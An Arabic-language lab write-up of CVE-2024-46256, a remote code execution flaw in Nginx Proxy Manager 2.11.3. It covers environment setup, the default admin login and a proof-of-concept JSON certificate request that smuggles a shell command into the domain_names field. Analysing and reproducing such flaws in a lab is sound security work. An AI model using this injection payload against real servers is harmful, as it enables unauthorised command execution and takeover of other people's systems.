تحليل ثغرة CVE-2024-46256 في Nginx Proxy Manager RCE
إعداد البيئة
1. تشغيل بيئة Nginx Proxy Manager 2.11.3
أو يمكنك استخدام السكريبت التلقائي:
python setup_environment.py
2. الوصول إلى Nginx Proxy Manager
- URL: http://localhost:81
- بعد إكمال الإعدادات الأولية، تابع الاختبار.
- تسجيل الدخول باستخدام حساب المدير الافتراضي (البريد الإلكتروني: [email protected] / كلمة المرور: changeme)
- التحقق من صلاحية الوصول إلى وظائف إصدار الشهادات.
معلومات الثغرة
- CVE ID: CVE-2024-46256
- المنتج: Nginx Proxy Manager
- الإصدار: 2.11.3
- نوع الثغرة: Remote Code Execution (RCE)
- CVSS: عالي
كود PoC
يستغل PoC مستخدمًا موثوقًا يقوم بإدخال قوالب/أوامر في حقل اسم النطاق أثناء طلب إصدار شهادة (مثل Let's Encrypt)، مما يؤدي إلى تنفيذ تعليمات برمجية عن بعد (RCE).
مثال على الحمولة (مثال توضيحي):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
بيئة التحليل
- نظام التشغيل: Windows 10
- Docker: أحدث إصدار
- Nginx Proxy Manager: 2.11.3